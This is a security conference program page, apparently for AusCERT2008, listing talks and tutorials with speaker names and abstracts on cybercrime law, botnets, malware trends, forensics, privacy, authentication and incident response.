Home
About AusCERT
About the Conference
Conference Location
About the Gold Coast
Travel Information
Visa Information
Call For Presentations
SETMAPE - Proceedings
Program
Executive Program
Presenter Information
Registration Fees
Delegate Registration
Sponsors
Sponsorship Information
FAQ
Program Tours
Exhibitor Staff Registration For Media
Contact Us 
AusCERT
University of Queensland
AusCERT2007
AusCERT2006
AusCERT2005
AusCERT2004
AusCERT2003
AusCERT2002Presentations:
| We Need Assurance! | |
| Brian Snow - Former Technical Director for the Information Assurance Directorate, NSA | |
| When will we be secure? Nobody knows for sure – but it cannot happen before commercial security products and services possess not only enough functionality to satisfy customers’ stated needs, but also sufficient assurance of quality, reliability, safety, and appropriateness for use. Such assurances are lacking in most of today’s commercial security products and services. I discuss paths to better assurance in Operating Systems, Applications, and Hardware through better development environments, requirements definition, systems engineering, quality certification, and legal/regulatory constraints. I also give some examples. | |
| The Convention on Cybercrime - meeting a global challenge | |
| Alexander Seger - Council of Europe | |
|
Cybercrime is the most transnational of all crimes, thus requiring a global response, including national legislation that is consistent between countries and tools for efficient international cooperation. The Convention on Cybercrime of the Council of Europe offers a framework for such a global response. The presentation provides an overview of this treaty and points out its benefits for countries of Asia and the Pacific. It will also introduce the recently adopted guidelines for cooperation between law enforcement and internet service providers in the investigation of cybercrime. |
|
| When Policies Collide: Security, privacy and 'ID-overload' | |
| Elisabeth Wentworth - Barrister & writer - Victorian Bar | |
|
In the war against online crime and internet facilitated terrorism, Governments are working against time with industry, science and law enforcement to develop and implement policies and legislative responses to minimize the impact of these threats. At the same time privacy concerns have grown and are the subject of their own legislative responses. Are they on a collision course with security responses? Has the work that has been done in both security and privacy been subverted by a growing trend to require high level identification as a condition of access to social activities? This session will consider these and other questions such as: " How do we develop workable and sustainable policy in such an environment? Are we making some fundamental mistakes? " How do we design education programs that reach the ones who need to know, rather than those already in the know? " How can Government and industry, in particular financial institutions, meet the challenge of engendering trust in the online channel while educating consumers to be 'appropriately distrustful' of the criminals? " And what does Sponge Bob Square Pants have to do with any of this? |
|
| The ISO 27001:2005 Journey at Dubai Aluminium Company Limited | |
| Ahmad Almulla - CIO, Dubai Aluminium Company | |
|
This presentation will talk about the need for implementing ISMS and certification of ISO 27001. The case study outlines the approach taken, results achieved, challenges faced and lessons learnt. |
|
| AusCERT Home Computer Users Security Survey 2008 | |
| Kathryn Kerr - AusCERT | |
|
The content of this segment of the program will be announced during the AusCERT2008 conference itself. |
|
| IPS for Real - Surviving active Intrusion Prevention in a mission-critical network | |
| Walter Muller - NEMMCO | |
| Many enterprise organisations have deployed IDS, some have purchased IPS, but few seem to have taken the courageous next step of enabling their IPS to actively block traffic considered to be malicious. NEMMCO, with its role in managing critical infrastructure in the form of the National Electricity Grid, thought long and hard about how to gain the security benefits of IPS without compromising its critical highavailability systems in the process. The proposed presentation is a case study describing the successful deployment of commercially-available IPS devices within NEMMCO. It describes the deployment process beginning from threat analysis, through product selection and phased deployment to the point where the system is currently in production use, actively blocking malicious traffic with automated updates and full monitoring in place. It describes the problems encountered and is intended to be of practical assistance for other organisations wanting to deploy IPS and survive. | |
| Recent developments in the field of High tech Crime with an emphasis to phishing and case studies | |
| Andre Dornbusch - BKA - German Federal Criminal Police office | |
|
Presentation Title: Recent developments in the field of High tech Crime with an emphasis to phishing and case studies. |
|
| The future of Botnets | |
| Steve Santorelli - Team Cymru | |
|
Botnets used to be relatively simple. Their control mechanism was based on Internet Relay Chat and there were a number of ways to dismantle the criminals ability to control this zombie army. There were some easy ways to make money and many people got into the botherding scene but quickly found that law enforcement and their fellow botherders made life difficult. Over the last 5 years, law enforcement around the world became more technailly adept at analyzing malware, monitoring botnets and identifying these criminals. Investigators partnered with industry experts and together it looked like we were going to start to re- claim the internet from the zombies. What actually happened was that we forced the botherders to evolve away from IRC to new forms of command and control. There was so much money to be made from spamming, phishing, ddos attacks and harvesting of passwords that they refused to stop - they just got much smarter. We now have a number of new types of botnet that have been designed to be much harder to track and dismantle. Some of them are so well designed that there is currently no known legal way to stop them. These botnets are continuing to grow and make money for teams of unidentified criminals and there is no prospect of an end to the misery these new botnets cause. This presentation will include an overview of basic botnets and highlight some of the new methods being employed by the new breed of botnets, in particular peer to peer and web based controllers with some case studies. |
|
| Trends in Internet based Fraud: Nigeria's EFCC Perspective | |
| Ibrahim Lamorde - Acting Executive Chairman, Economic and Financial Crimes Commission (EFCC), Nigeria | |
|
Ibrahim Lamorde is an Assistant Commissioner of Police who works with the Economic and Financial Crimes Commission (EFCC) of Nigeria. He has been investigating and prosecuting economic and financial crimes for many years. This has given him insight into trends regarding Internet based fraud. Mr Lamorde will also talk about his experience dealing with other government Law enforcement agencies such as the FBI, Metropolitan Police, United States Postal Inspection Service (USPIS), Internet Crime Complaints Centre (IC3), Dutch Police, German Police, South African Police etc. |
|
| Cyber Crime within the Russian Federation | |
| Kimberly Zenz - iDefense | |
|
The Russian Federation has long been a major source of cyber criminal activity. While financially-motivated operations such as phishing, trojans, botnets and even traditional spam operations targeting international financial institutions remain common, a growing number of Russian cyber criminals are targeting victims within their own county and/or engaging in activities such as distributed denial of service attacks aimed at competitors and occasionally political or social targets. This presentation will review some of the more salient characteristics of online criminal activity within the Russian Federation as well as some of the services and support available to the practitioners. |
|
| Biometrics - are they ready for use in Banking and Payments? | |
| Colin Whittaker - APACS | |
|
Biometrics in many pundits minds are rapidly becoming the silver bullet for all authentication requirements. This is often based on some very grave and false assumptions on their capabilities for real world use, and a misunderstanding of the ease with which they can be deployed. There is also a danger when biometrics are put forward as a solution to fail to apply the classical security and business risk assessments to determine if and how the technology should be used. We in APACS have been monitoring biometrics technologies for a number of years in order to understand what role it could play in banking and payment systems, especially in the area of customer authentication. The aim of this presentation will be to assess the current capabilities and limitations of biometrics and assess how ready these technologies are for use in our sector, and in doing so help to provide the basis for a more reasoned and balanced debate on biometrics. |
|
| Government as a privacy-protective Identity Provider: the New Zealand case | |
| Vikram Kumar - NZ State Services Commission | |
|
Abstract: The New Zealand Government is developing a service that allows people to verify their identity online to a near-passport level to government agencies. This service will protect peoples? privacy without unique national identifiers or a national identity card. The concepts behind the service can be extended to authoritatively verify information online that is held by government agencies about them. Intended audience: Academia / Consulting / IT, IS Managers / Media / Marketing / Policy and Government Analysts / Research / Technical and architects / Vendors and System Integrators Learning objectives: 1. Distinguish between identity, attributes, assertions, claims, authentication, and authorisation. 2. Demonstrate how government can be a privacy-protective Identity Provider. 3. Debate the need for unique national identifiers and national identity cards. 4. Recommend an online solution for giving information to government only once. 5. Question how user-centric identity approaches, including Windows CardSpace and OpenID, can be used in the government context. |
|
| The ALRC's review of privacy law and practice | |
| Professor David Weisbrot - Australian Law Reform Commission | |
|
The Australian Law Reform Commission is in the final stages of a major review of Australian information privacy law and practice, with the main aims of reducing complexity and ensuring that the law is sufficiently robust to deal with the new (and emerging) electronic environment. In September 2007, the ALRC released a three volume, 2000 page, Discussion Paper (DP72) containing 301 proposals for community consideration. The major areas covered include: simplification and harmonisation of privacy laws (including unification of the two sets of privacy principles); exemptions; powers of the Privacy Commissioner; health privacy; credit reporting; children's privacy; telecommunications; cross-border data flows; data breach notification; and the creation of a statutory cause of action for serious breach of privacy. In the inquiry, the ALRC has undertaken the largest public consultation exercise in its history, participating in about 250 meetings and receiving nearly 600 written submissions. The final report and recommendations are due to be presented to the Attorney-General on 30 May 2008. |
|
| Microsoft SCPcert announcement | |
| Zot O'Connor - Microsoft | |
|
This will be the world wide announcement of a new Microsoft program 'SCPcert' in which Microsoft will be working closely with National and Regional CERTs through its SCP and MSRA program. |
|
| Flow Visualization in an Operational Environment | |
| Lee Rock - US-CERT | |
|
This presentation will review the use of various visualization technologies in use by US-CERT in viewing flow data from the Einstein program. We will quickly cover the common types of flow visualization and the challenges faced in presenting large volumes of data visually. Finally, we will examine five applications in use by US-CERT, and the benefits and limitations of current methods for presenting flow data visually. |
|
| Broad lessons from the Computer Network Vulnerability Assessment program AND Cyber Storm II - an international cyber security exercise. | |
| David Campbell AND Jordana Siegel & Steven Stroud | |
|
Broad lessons from the Computer Network Vulnerability Assessment Program: |
|
| Standing Behind Technical Promises | |
| Alana Maurushat - University of NSW | |
|
The information security landscape is shifting from self-regulation and legal complacency to one of regulation and legal activism. Privacy and security are no longer seen as diametric opposites. A middle playing field of personal information security is emerging. The competing tension between protecting anonymity online and accountability for online activities has heightened. Where this tension has traditionally played out in the cyber-criminal foray, we are now seeing similar arguments spilling over into the corporate realm. On the one hand, there is a push for legal protection of anonymous transactions in online activities (see recommendations for the Review of Australian Privacy Law). On the other, new laws have been introduced in an attempt to boost accountability online such as enhanced data retention laws. Accountable conduct for users as well as accountable conduct for corporations (including ISPs, banks, software vendors, and all corporations and organizations who handle personal information). At the same time we are seeing a decline in public trust in using online services. As such, we are headed towards a significant expansion of corporate obligations concerning information security. This presentation will provide an overview of new and future legal obligations in information security. It will examine such trends in the international and Australian framework where appropriate. |
|
| Geekonomics: The Real Cost of Insecure Software | |
| David Rice | |
|
Software is becoming the foundation of civilization; yet few, if any industries composing national infrastructures enjoy such little oversight as software production. Despite general agreement on inadequate software development practices and the enormous cost born by individuals and organizations for protecting their systems from exploitation, the software industry enjoys remarkable insulation from liability and regulation. This is a dangerous proposition for national infrastructures. David Rice illuminates the economic impacts of poor quality software and compares regulatory standards among various industries as he challenges software purchasers to demand better quality software so that governments, faced with a popular uprising, will refuse to remain silent on the issue. Software is becoming the foundation of civilization and therefore demands the time and attention foundations deserve.
|
|
| Web 2.0 INsecurity | |
| Nikola Mijatovic & Benjamin Mosse - Sec Pro | |
|
Many service providers have offered their business through web applications. First practical session where attendees get a chance to apply their knowledge gained in the previous parts. A local HACKME application will be used as target. |
|
| Using F.E.D.S. - The Forensic Examiner's Database Scalpel | |
| Dave Litchfield - NGS Software | |
|
FEDS is a breach investigation tool designed to expedite the discovery of evidence after a compromise of a database server. This tutorial will take the class through how to set up a new case and gather then process evidence files after a breach. Once all the processing has been performed records of interest will be located with the effective use of filters then collated and correlated producing a complete time line of events. |
|
| Computer Forensics and Electronic Discovery: Lessons learnt from the largest and most complex investigations in Australia | |
| Ajoy Ghosh - LogicaCMG | |
|
Synopsis: The workshop is in two parts: (i) computer forensics and (ii) electronic discovery. Part 1: Whilst commentators have had much to say about the proper conduct of a computer forensic examination few examiners have actually been tested in the Courtroom. When it has happened, most have been unable to withstand the unrelenting attack of the well coached barrister’s cross-examination. However, the reality is that many examinations are conducted by frontline IT staff with little forensic training and their experience as an expert witness fashioned by television shows like CSI. This part of the workshop draws on the presenter’s experience coaching both prosecution and defence teams to prepare technical and investigative staff become better witnesses and in doing so, protecting themselves and their company. Part 2: Electronic discovery has come to be a common and exacting task performed either by legal professionals with little understanding of the organisation’s IT environment or IT staff with little appreciation for the importance their tasking. If not conducted properly the result could be, and often is, that the adversary is unwittingly given incriminating documents (i.e. the smoking guns) or worse, the organisation found liable for the adversary’s legal costs. In extreme cases, inpiduals can be criminally sanctioned for hiding or destroying evidence. Without the right preparation, electronic discovery is a costly endeavour. The presenter has worked on discoveries costing in excess of 2 million dollars and routinely costing between 200 and 500 thousand dollars. Independent studies show that properly conducted electronic discovery costs between 10% and 15% of the traditional (i.e. paper) undertaking. By examining critical decisions made in large or complex Australian cases, the presenter will help IT decision-makers understand how they can best prepare their organisation for litigation and how they can competently undertake an electronic discovery. Handout: Participants will be given a course manual that is some 75 pages. Format: ½ day workshop Other information: participants will be provided with a number of giveaways. These will be forensic software and hardware provided by vendors. |
|
| Enterprise Resilience through Business Continuity Planning [Business Tutorial] | |
| Guy Peterson & Mr Grover - Booz Allen Hamilton | |
|
Business continuity planning is the process of developing advance arrangements and procedures that enable an organisation to respond to a disruptive event in such a manner that critical business processes continue with planned levels of interruption or essential change. The BCP program takes a full lifecycle approach to prevent and respond to a range of potential disruptions with defined roles and responsibilities throughout. Business continuity planning is a never-ending cyclical process. Procedures require routine testing and evaluation and the strategies for achieving business continuity need to be examined as business operations, the operating reality, and technologies change. Business continuity planning establishes an enterprise-wide risk-impact based approach to aligning assurance and continuity objectives with business objectives. This half-day workshop will discuss operational environments and the drivers which are making sound business continuity planning a necessity for Enterprise Resilience. The architecture of a business continuity plan will be discussed, and the audience will be taken through each step of the business continuity planning process working towards the development of a complete Business Continuity Plan. Steps to be examined will include: Establish Planning Roles and Responsibilities; Conduct Risk Assessment; Conduct Business Impact Analysis; Develop Continuity Strategies; Plan Testing, Training, and Exercises; and Plan Maintenance. This half-day workshop is aimed at any inpidual who wishes to learn a sound methodology for developing, implementing and maintaining a Business Continuity Plan in support of a larger Business Continuity Management Program. Anyone attending this half-day workshop can expect to gain a good understanding of a Business Continuity Management Program, and the process of developing, implementing and maintaining an effective Business Continuity Plan (BCP). |
|
| Microsoft Defend the Flag | |
| Andreas Junestam & Scott Stender - iSEC Partners LLC | |
|
Defend The Flag (DTF) is a unique two day hands-on training course, delivered by experts from iSEC Partners, that turns the traditionally dry Windows security training workshop into an interactive, personal, and visceral experience for each attendee. Day 1:
Day 2:
Why attend? Learn how to secure and defend your Windows infrastructure from the latest threats and attacks. Who should attend? Security Response Engineers, Security Professionals or IT Professionals with a strong security interest. |
|
| "Hands On" Wireless Service Auditing with Open Source tools | |
| Neal Wise - Assurance.com.au | |
|
This tutorial will equip attendees with an understanding of conventional wireless technologies (802.11a/b/g/n, Bluetooth), their current risks and how to defend and provision secure wireless services. Attendees will be given familiarity with common wireless security tools and the opportunity to actively and passive attack and defend real wireless networks. Attendees will also learn about wireless solution control design. |
|
| Building a Walled Garden - Abuse and Incident Handling Tooling for Network Managers | |
| Scott McIntyre - XS4ALL | |
|
The tooling involved with active incident handling and abuse mitigation requires tools and procedures not just to detect problems within your network, but to act on them and wherever possible remove the threat whilst at the same time providing customer awareness and enhanced security. This tutorial will cover the bespoke tools one ISP has built and deployed which detect problems, notify customers of issues, track incident status within the organisation, and place customers in a Walled Garden until their systems are clean. The tools discussed were all built on open-source software, and the approaches covered can apply to a variety of organisations, not just Internet Service Providers. The tutorial will include live demonstrations of the technology discussed, a simulation of the steps required to build a Walled Garden, and plenty of opportunity for interaction and discussion on the necessity of this tooling and the policy issues that go along with building and supporting them. |
|
| Presentation to be announced | |
| None yet - None yet | |
| No abstract provided for this presentation yet. Please check again later. | |
| Pure hacking: The Tutorial | |
| Chris Gatford & Ty Miller - Pure Hacking | |
|
Pure Hacking: The Tutorial is a highlights package from existing course offerings that provide intensive, hands-on training. Participants will learn how hackers think and act. They learn how hackers can gain methodically gain entry in to an organisations information systems to steal information. The intent of this course is to assist organisations in arming front line staff with the approach, the latest tools and techniques that attackers utilise so that they can better secure there organisations IT environment. Pure Hacking believe they are in a very good position to provide the tutorial as day in day out they are discovering the latest attack techniques to utilise in penetration testing for our client base during the work we perform for them. -Why attend this tutorial? To gain an understanding of an approach to performing penetration testing As tools and techniques to attack infrastructure are becoming easier to use and more widely available allowing less sophisticated attackers to compromise complex environments. To obtain knowledge and training to assist in defending your organisation against attack. To learn and understand this constant threat to business. -Who should attend? System Administrators, Information Security Specialists, Security Administrators and Analysts, Security Testers, Internal Auditors -What will they learn? A high-level understanding of a methodology for penetration testing A hands on approach for effective penetration testing Controls and countermeasures Leading practices in testing approaches for various technology types Assistance in thinking outside the box. The tutorial will include modules covering the essentials of penetration testing and the various technologies commonly utilised in most organisations. This tutorial will provide a brief overview of: Which tools to use How to use the tools, and most importantly The methodology behind security testing. The tutorial will allow a student to understand the knowledge required for a person to be considered a capable, resourceful, and self-sufficient security tester. Course Outline The course is compromised of the following modules and concludes with a two-hour lab simulating an organisation to compromise.
LAB: The course will then have a two-hour lab simulating the above technologies allowing students to test the skills in which they learnt in the morning to compromise some of the technologies and tools demonstrated during the course of the day. |
|
| Defence against the dark arts; repelling the wily hacker | |
| Bill Cheswick | |
|
In this tutorial we will examine the issues of securing a small site of Unix-style computers in a hostile environment. We will nail down freshly-installed unix systems, try jailing some important server and client applications, and discuss software safety and resistance against outside attacks. We will secure and then probe actual systems with a few common hacking tools, and discuss the ideas behind securing a community of systems with strong host security, firewalls, routing tricks, and similar tools. System and network administrators with some experience administering Unix systems will gain understanding and confidence at designing sites that are highly-resistant to network attacks. |
|
| Vunerabilities, Exposures, Attacks and the Enterprise [Business Tutorial] | |
| Bob Martin and Steve Christey - MITRE | |
|
Not all of the newest, coolest security issues involve Web 2.0. In 2007 alone, approximately 7000 vulnerabilities were publicly reported in the Common Vulnerabilities and Exposures (CVE) list. Due to the volume of raw data, interesting discoveries can be lost in the noise, especially if they aren't published by well-known researchers for software with large installation bases. These problems might fly under the radar today, but they could become the research fad of tomorrow. This talk will start with an up-to-the-minute vulnerability classes and attacks that have yet to be well-documented. It will briefly cover common analytical errors and terminology issues that prevent a deeper appreciation of the weaknesses that lead to security problems. It will introduce the basic tenets of vulnerability theory, which is a framework for understanding and reasoning about vulnerabilities, including a vocabulary for discussing important security concepts. Vulnerability theory can be used to anticipate new security issues, instead of waiting and hoping that we'll notice them the next time we dare to drink from the Internet fire hose. As the threat of attacks against organizations broadens from the networks and commercial software to include individual software applications and infrastructure of all types, there is an increasing need for assurance that the software products acquired or developed are free of known types of security weaknesses and resistant to known attacks. To accelerate closing the gap on vulnerabilities and foster assurance that software has been tested for known security issues the Common Weaknesses Enumeration (CWE) - a dictionary/encyclopedia - is being developed that can be used to look for weaknesses in code, design, or architecture, guide the development of secure software, as well as to teach and train software developers about the code, design, or architecture weaknesses that they should avoid. This talk will also cover the Common Attack Pattern Enumeration and Classification (CAPEC), which is developing a collection of common attack patterns to support security requirements definition, threat modeling, attack resistance through architectural risk analysis and secure code review, and targeted risk-based security testing of software as well as teaching software developers to understand and leverage the attackers perspective. Combined, the CWE and CAPEC efforts support the effective and efficient creation of secure software testing target lists. Together CVE, CWE, and CAPEC provide the enterprise with tools, techniques and methods for planning, measuring, and managing their software assets and processes in a more scalable and consistent manner that is agnostic to their specific vendor technologies and suppliers, which opens the door to consistency and leverage across industries and throughout the various portions of an enterprise. |
|
| Enabling End-to-End Trust | |
| Scott Charney - Corporate Vice President, Trustworthy Computing, Microsoft | |
| The growing trend toward malicious attacks on the computer systems used by consumers, businesses and governments clearly demonstrates the need for a more comprehensive and effective approach to security and privacy. Scott Charney, VP Trustworthy Computing - Microsoft Corporation, will describe a new approach that introduces widespread strong authentication and accountability across the environment as a means of making the Internet a safer place to work, play, communicate, and conduct business while preserving individual privacy. In this presentation, Scott will summarize his ideas and the reasons behind them, and seek the community's feedback. | |
| Cisco Strategic Security Approach | |
| John Stewart - CSO, CISCO | |
| Threats to the enterprise have trended away from simply assaulting vulnerabilities in the perimeter to more pervasive attacks that cause damage, disruption to the business, and significant financial loss. Attackers are no longer hobbyists making a name for themselves, but well-sponsored and resourced professionals seeking monetary profit. As the threat landscape continues to evolve and mature, there is a greater need for enterprise security professionals to take a more holistic approach to security. The day when we could simply apply technology to the problem is long gone. Today, we need a strategic security approach that includes people, process and technology to provide the most robust and resilient security posture. John Stewart discusses the essential practices of enterprise security, shares lessons learned, and provides his perspective on the value of developing an embedded security practice in your organization. | |
| Implementing Multi-factor Authentication for Internet Banking - or Why 2FA is only two small steps in the right direction | |
| David Leach - Standard Chartered Bank | |
|
David will review some of the key experiences and lessons from implementing 2FA in a banking context. He will hopefully answer the question whether 2FA actually does improve security. He will also use that experience to highlight the bigger context of the many changes in approach necessary to properly secure the highly networked business world. He will suggest some fundamental changes in thinking about security models that will help lay the path for many more steps in the right direction. |
|
| Who's Device is it anyway? | |
| Paul Dorey - CSO, BP | |
|
Companies still believe that they own the end to end digital environment used by their staff. So they block instant messenger, Facebook and other digital "evils" and restrict the devices used to access the corporate network. But will security policies set by an executive generation only just proud of their email and mouse skills really be sustainable? Let's face the real world of the digital future and build a security sustainable future of the personal digital environment. I am prepared to discuss how... are you prepared to join my session? |
|
| Rethinking Passwords | |
| Bill Cheswick | |
|
Passwords and PINs are used everywhere these days. The engineers who design our security systems have four decades of advice on the deployment and use of passwords. A lot of this advice is appropriate only for outdated threat models. Many new proposals are interesting, but seem unlikely to be successful in the real world. I will attempt to update this advice with the hope that if things don't become more secure, at least they may become easier to use. |
|
| Streetwise Leadership | |
| Rob Redenbach - Independent security consultant | |
|
Streetwise Leadership blends hard facts and personal experience (plus a healthy measure of good humour) to cut to the bone of what it takes to be a better leader. Drawing from a diverse range of extreme experiences in Asia, Africa and the Middle East, Rob provides pragmatic insights into what it takes to influence the outcome of any situation involving people. Offering a refreshingly independent view of effective leadership, Rob's strategies equip delegates with practical tools needed to bridge the gap between mere authority and genuine leadership. |
|
| Privacy, the Law and Information Security | |
|
Adam Spencer (Chair), Seamus Byrne, Alana Maurushat, David Rice, Colin Whittaker Alana Maurushat, Brian Snow, Graham Ingram, Dan Klein, Peter Gutmann, Ajoy Ghosh, Vikram Kumar |
|
|
This panel session will take the form of a series of short debates (around 7 minutes each) with differing teams of 3 panellists per side for each topic. The topics selected will cover a broad range of subjects under the banner of 'Privacy, the Law and Information Security'. |
|
| Security Challenges in Grid Environments | |
| James Barlow - NCSA Senior Security Engineer | |
|
Security within an organization can often be a challenging task. There are usually multiple levels within an organization, as well as multiple departments that you may have to work with when responding to a security incident. What are the challenges in a grid environment where you may have thousands of users using resources within your organization that you have no control over? Then when an incident does happen (that's not an "if"), how do the organizations within the grid work together to respond to the incident, which can usually have spillover to many sites within the grid. This work addresses the challanges of security measures in the more complex environment of grid computing where there is a distributed user base and multiple physical entities composing a virtual organization. We will cover how the TeraGrid sites deal with coordinated security measures and give some real world examples on actual incidents. |
|
| Security Lessons Learned from setting-up a Grid-CERT | |
| Klaus Moller - DFN-CERT | |
|
Grid Computing has often been heralded as the next logical step after the World Wide Web. Although it is often compared to the World Wide Web, it is vastly more complex both in organisational and technical areas. It has been argued "that CSIRT activities [i.e. security and incident response] for a Grid are not fundamentally different from those performed by a traditional CSIRT." In practice, there are many challenges to be overcome to establish a CSIRT for the specific needs of Grids and Grid users. In the organisational field, CSIRTs have to learn that while Grid communities are technically already part of a teams constituency, serveral problems regarding security requirements, organisational structures, terminology, have to be overcome to efficiently communicate and cooperate. To handle the technical part of Grid incidents as well as to be able to proactively help sites in securing their Grid infrastructure, a CSIRT has to develop not only an understanding about the Grid middleware used in the Grids of their constituency. Additionally, Grid systems and structures are build and operated on top of as well as shared with traditional systems and software in a computing center. Unterstanding the issues arising from the interaction is also vital to providing efficient incident response and security servicey. With this understanding, more advanced services like Grid-honeypots or specific intrusion detection signatures for Grids may be build in the future. |
|
| How least privilege models, like UAC and su, will not defeat malware | |
| Roger A. Grimes - Microsoft | |
|
Least privilege models inconvenience users and developers, while not diminishing malicious hacking and malware over the long term; when we should being doing the exact opposite. Least Privilege models have their uses, but minimizing malicious hacking isn't one of them. Attend and learn more about Vista's UAC, specifically discuss the challenges to today's least-privilege models, and learn exactly where hackers can hide their malware in user mode models. |
|
| The Operational Methodology and Process of Malware Collection and Analysis | |
| Richard Perlotto - Shadow Server | |
|
Established in 2004, The Shadowserver Foundation gathers intelligence on the darker side of the internet. We are comprised of volunteer security professionals from around the world. Our mission is to understand and help put a stop to high stakes cybercrime in the information age. This presentation will be a summary on how Shadowserver gathers-in the different data that it has and what it does with that data. For more information on the ShadowServer Foundation, please see URL: http:// www.shadowserver.org/wiki/ |
|
| Evolution of Kernel-Mode Malware | |
| Kimmo Kasslin - F-Secure | |
|
A few years ago kernel malware were simple pieces of code whose purpose was to perform a specific task on behalf of the main malware component. They were most often used as rootkits to hide files, registry entries and network connections belonging to the main payload. They were not packed or obfuscated and their analysis was easy if the analyst was familiar with kernel-mode code and tools. Since then things have changed. Full-Kernel malware have now entered the scene and this presentation will go through some of the most important developments that have had a big impact on the evolution of kernel malware. |
|
| Beyond bot-herders: Protecting against targeted attacks | |
| Paul Chamberlain - Australian Defence Signals Directorate | |
| So you've got patching and anti-virus under control, you've got a good firewall and you've even set up an IDS. Are you safe yet? Maybe from bot-herders but what about other threats? This presentation will look at the threat of targeted attacks against your organisation. In particular the threat of targeted content based client attacks and how trust relationships inside your network are helping your attackers. The presentation will walk through attack scenarios that can defeat your traditional border defences to get in and once there find the goods and get out. This talk is intended for anyone involved with IT security including system administrators, network engineers, security professionals and standard operating environment builders. | |
| Trusted Computing and its status in in the real-world marketplace. | |
| Ronald Perez - IBM Research Center | |
|
A presentation detailing the basic features of Trusted Computing and the various activities and initiatives taking place within the organisation, and what specifically IBM is doing in this space. This should give the audience a good idea of how and where these technologies are being deployed, as well as what to expect in the near future and what some of the major issues are. A presentation that delivers generic information on Trusted Computing and That group's global activities will likely be very well received indeed. I believe that our audience will want to know where Trusted Computing is up to in the real-world marketplace.. ie When can we expect to see it in widespread deployment..?
|
|
| The Software Security Landscape - Making Security Measurable | |
| Bob Martin and Steve Christey - MITRE | |
|
p>The security and integrity of information systems has become a critical issue within most types of organizations, and finding better ways to address the topic has become the objective of many in industry, academia, and government. One of the more effective approaches gaining popularity in addressing these issues is the use of standard knowledge representations, enumerations, exchange formats and languages, as well as sharing of standard approaches to key compliance and conformance mandates. Leveraging these sorts of standards helps answer today's increased demands for accountability, efficiency and interoperability without artificially constraining options for technologies, solutions or vendors with respect to the interfaces and data representations they use internally and for external interaction with operational, development and sustainment tools and processes. There are a large number of security measurement and management activities and initiatives being pursued by a variety of groups including public standards groups, industry associations, academia, and government. This presentation will describe a cross-section of this software security landscape and explore how many of these efforts are actually mutually supportive, well aligned, and complementary. Together these efforts compose major segments of a comprehensive approach to economically addressing the software development, systems operation, and accreditation/reporting needs of today's corporations, governments, and economies. The security, integrity, and trustworthiness of the information technology capabilities of our society's critical infrastructure and commerce capabilities are totally dependent on software, networks, and information. Improving the security and manageability of these elements will be beneficial to all. |
|
| Introducing F.E.D.S - The Forensic Examiner's Database Scalpel | |
| Dave Litchfield - NGS Software | |
|
FEDS is a breach investigation tool designed to expedite the discovery of evidence after a compromise of a database server. This talk will introduce the main features of FEDS and show how it can be used to show who did what and when. |
|
| Things That Make Us Dumb: Why Security User Interfaces lead to Insecure User Actions | |
| Peter Gutmann - University of Auckland | |
|
Donald Norman's book "Things That Make Us Smart" (a follow-on to his classic "The Design of Everyday Things") looks at how appropriately-designed technology can help humans accomplish tasks and achieve goals. Unfortunately technology isn't always appropriately designed, and can have quite the opposite effect to the one intended. One area where this has proven particularly problematic is security user interfaces, where the design is purely by geeks for geeks. This talk examines the how and why of the destructive interaction between the way normal humans do things and the user interfaces that are typically used to present computer security information to users. |
|
| What have you done for us lately? What your ISP can, and should do in the fight against internet abuse | |
| Scott McIntyre - XS4ALL | |
|
You're working hard on defending your network, and your ISP is just your link to the internet, right? Wrong! In this presentation, Scott will discuss the continuously evolving threat landscape and how this affects ISP's and you. Scott will also touch on the way XS4ALL has grown a business model with security and abuse handling built in. Focusing on specific developments over the last year, you'll hear about some of the latest trends in malware and what Internet providers can and are doing to help with overall Internet security. Highlighting the many types of resources which are being actively abused (home computers, servers, routers), Scott will touch on some of key threats these systems face, and how to minimise the risks. Today's top threats are increasingly motivated by financial gain and Scott will give a glimpse into some of this underground economy throughout his talk. Finally, Scott will use case studies to illustrate the procedures that XS4ALL has in place to detect and mitigate security incidents on its network. Of course, this also has a direct effect on the security of its customers' networks. You will gain an understanding of the role an ISP can play in defending your network. |
|
| “Infrastructure Security and Internet Incident Response” | |
| Danny McPherson : Chief Research Officer - Arbor Networks | |
|
This session will provide a discussion of the Infrastructure Security Survey results, to include details on deployment and implementation of popular attack detection and mitigation techniques, common attack vectors, attack scale and related trends. We'll also provide an incident response methodology and information regarding structure and organizational points of contacts for issues with various Internet domain name operators and IP address space administrators. Some useful tools and data repositories related to these topics will also be discussed. Finally, we'll discuss many of the challenges; legal, technical and economic, with SPs taking action to mitigate bot and other other Internet security threats. |
|
| Phishing and Pharming (and the Future) | |
| Sid Stamm - Indiana University | |
|
Stealing identity by means of Phishing or Pharming is a growing threat, and we are furiously working to keep ahead of the criminals. The threat is changing, and becoming more complex with techniques such as distributed phishing attacks, router bot networks, vishing and rock phishing. Sid Stamm will discuss cutting edge research on attacks and countermeasures, and describe where he sees the attacks going in the future. |
|
| V-Next Honeyclients : Evolving Revolvers - Discover them before they discover you | |
| Stephan Chenette - Websense | |
|
A lot has changed since honeyclients were first used for mining the web for malicious code back in early 2000. This session will examine JavaScript obfuscation, polymorphic script, client and IP detection, shell exploits, Web 2.0 attacks, and detection avoidance. Examples of common, and not so common, web attacks will be presented - and how to discover them before they discover you. |
|
| Malware Without Borders: A Regional Look at Microsoft's Malware Telemetry Covering the APAC Region | |
| Ziv Mador - Microsoft | |
| As malware and potentially unwanted software are becoming motivated more and more by financial gain, their nature is also changing. The attackers often use social engineering techniques to lure the user to run their code and usually will show some messages or bogus warnings using some language. The effectiveness of the attack in any specific region will then rely on the popularity of that language in that region. Other factors may impact too such as the level of user education in that region and the usage of security products there. The result is that we see more and more threats that affect specific countries or regions more than they affect others. This paper will overview some major differences in the types of malware and spyware that exist in different regions around the Asia Pacific region and will provide specific examples. The information for this paper is collected from hundreds of millions of computers around the world though insights specific to the Asia Pacific region will be the focus of this presentation. Given the locality of many of the threats, the model of national response teams and organizational response teams can be extremely helpful. The paper is going to call for even higher level of interaction between these response teams and the security software industry as well as several working examples which illustrate success. | |
| Security As If Your Life Depended On It (because it might!) | |
| Dan Klein | |
|
